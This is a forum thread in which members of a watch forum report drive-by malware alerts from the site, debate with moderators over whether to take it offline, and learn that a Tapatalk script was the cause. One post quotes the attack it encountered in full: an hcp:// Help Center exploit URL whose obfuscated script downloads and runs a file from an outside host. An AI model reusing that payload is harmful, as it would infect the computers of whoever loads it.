My Mac, Safari and TRF

[gregmoeck]

sorry if i came off harsh, i know its tough to fix these server side issues, hang in there

[Mickey®]

Quote:

Originally Posted by gregmoeck

damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.

I'm on a Google Chrome Operating system Laptop...So it isn't Microsoft exactly...

[dsio]

Quote:

Originally Posted by gregmoeck

damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.

This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.

[77T]

BTW a new exploit has surfaced to attack iPads running Safari. It just causes an overflow since the Java Trojan won't download to an iPad.

Just sharing in the spirit of teamwork.

iPads and iPhones running Tapatalk seem to still be fine. Have been using both with no problems

But I tried the iPad with Safari just to check. It ran for several minutes before picking up the probe and then it would just close Safari as the redirect tried to load the jar files.


Sent from my iPad using Tapatalk

[LordNinja]

I thought so. Hmmm

Quote:

Originally Posted by gregmoeck

sql database injection or some infection, passwords may be compromised, here is what i get now.



hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,111,1 14,101,105,110,111,101,107,115,111,110,121,46,99,1 11,109,47,99,111,110,116,101,110,116,47,104,99,112 ,95,118,98,115,46,112,104,112,63,102,61,50,54,38,1 00,61,49,34,44,102,97,108,115,101,58,46,115,101,11 0,100,40,41,58,83,101,116,32,65,32,61,32,67,114,10 1,97,116,101,79,98,106,101,99,116,40,34,83,99,114, 105,112,116,105,110,103,46,70,105,108,101,83,121,1 15,116,101,109,79,98,106,101,99,116,34,41,58,83,10 1,116,32,68,61,65,46,67,114,101,97,116,101,84,101, 120,116,70,105,108,101,40,65,46,71,101,116,83,112, 101,99,105,97,108,70,111,108,100,101,114,40,50,41, 32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,1 05,116,101,76,105,110,101,32,46,114,101,115,112,11 1,110,115,101,84,101,120,116,58,69,110,100,32,87,1 05,116,104,58,68,46,67,108,111,115,101,58,67,114,1 01,97,116,101,79,98,106,101,99,116,40,34,87,83,99, 114,105,112,116,46,83,104,101,108,108,34,41,46,82, 117,110,32,65,46,71,101,116,83,112,101,99,105,97,1 08,70,111,108,100,101,114,40,50,41,32,43,32,34,92, 34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,10 8,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,9 2,108,46,118,98,115,32,38,38,32,116,97,115,107,107 ,105,108,108,32,47,70,32,47,73,77,32,104,101,108,1 12,99,116,114,46,101,120,101)));</script>

[LordNinja]

Quote:

Originally Posted by dsio

This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.

Sadly true.

[LordNinja]

Sounds like we have a lot of other experienced It/networking people finally chiming in.

[LordNinja]

I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.

[Rockrolex]

Quote:

Originally Posted by Cru Jones

my message:

"Symantec Endpoint Protection - [SID: 24225] - Web Attack: Blackhole Toolkit Website 5 detected."

I've been getting the same message for the past couple of days. Norton 360 has been blocking the attacks.

[sleddog]

Quote:

Originally Posted by dsio

This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.

Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall/and or loggout from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent

Quote:

Originally Posted by LordNinja

I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.

The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!

[Grissom]

I have been browsing with safari via my iPhone with no apparent issues so far.

While I hate to be without TRF for even a few minutes I also would be supportive of TRF being taken offline in order to clean things up so that those with less sophisticated or secure systems would not be unwittingly infected.

Many thanks to Steve, et al, for working towards a speedy resolution

[Rockrolex]

I use IE with Verizon Yahoo as my browser on XP machines. I have no problem accessing TRF. The only issue I've had in the past two days was noted in post #129 above.

When I browse for Rolex Forum in Yahoo, TRF comes up immediately with no issues.

However, when I did a similar search using Google, I got the following message:

Quote:

Warning - visiting this web site may harm your computer!



Suggestions:

• <LI sb_id="ms__id745">Return to the previous page and pick another result.
• Try another search to find what you're looking for.

Or you can continue to http://www.rolexforums.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

If you are the owner of this web site, you can request a review of your site using Google's Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Advisory provided by

This may be a Google problem more than a TRF problem.

[Freelance]

Quote:

Originally Posted by sleddog

Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall/and or loggout from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent


The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!

Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.

[dsio]

Quote:

Originally Posted by Freelance

Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.

If you go to view source you can see exactly where its being loaded, check on any page and do a find for "d.write", its where a heap of banners for watch top 100 lists used to be at the bottom of every page.

[sleddog]

Quote:

Originally Posted by Freelance

Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.

This is not taken in "the wrong way".
My advice to you and anyone else receiving the warnings, is "to log out"!!!!

TRF is not holding you hostage to log in, nor is it doing nothing!!

All i'm asking is to keep the antagonism to yourself until the fix has been resolved!
There's more to it than you can see or fathom.

My post was an alternative, not a directive!!

[Lol-x]

Please be patient guys we are working on getting this resolved asap.

I hope the solution will be obtained shortly.

Please accept my apologies.

I do not have any evidence of compromised accounts or computers at this stage, it may be a false positive, but it is best to err on the side of caution.

[2careless]

Until there is a fix to the problem, it seems to me that by disabling scripting will disable the access of the malware.

In IE, this can be done by changing the security level of the browser:
1. Goto "Tools" -> "Internet Options", and select the "Security" tab
2. Select "Internet zone", tick "Enabled Protected Mode", select "Custom Level"
3. Scroll down the Settings to "Scripting" section:
4. Right under "Scripting", there is "Active scripting", either check Disable, or Prompt. Then click "OK" and "OK" to get out.
By choosing "Disable", some website may break, You can choose "Prompt" and make sure you say "no" in TRF.

In Firefox, it's easier:
1. goto "Tools" -> "Options"
2. goto "Content" tab at the top.
3. uncheck "Enable Javascript".

Hope this helps.

P.S. If you google "Disable Javascript in IE", there are several answers that contains malware by itself. Be careful!

[Lol-x]

The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.

[STEELINOX]

Quote:

Originally Posted by Lol-x

The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.

Great news StevO !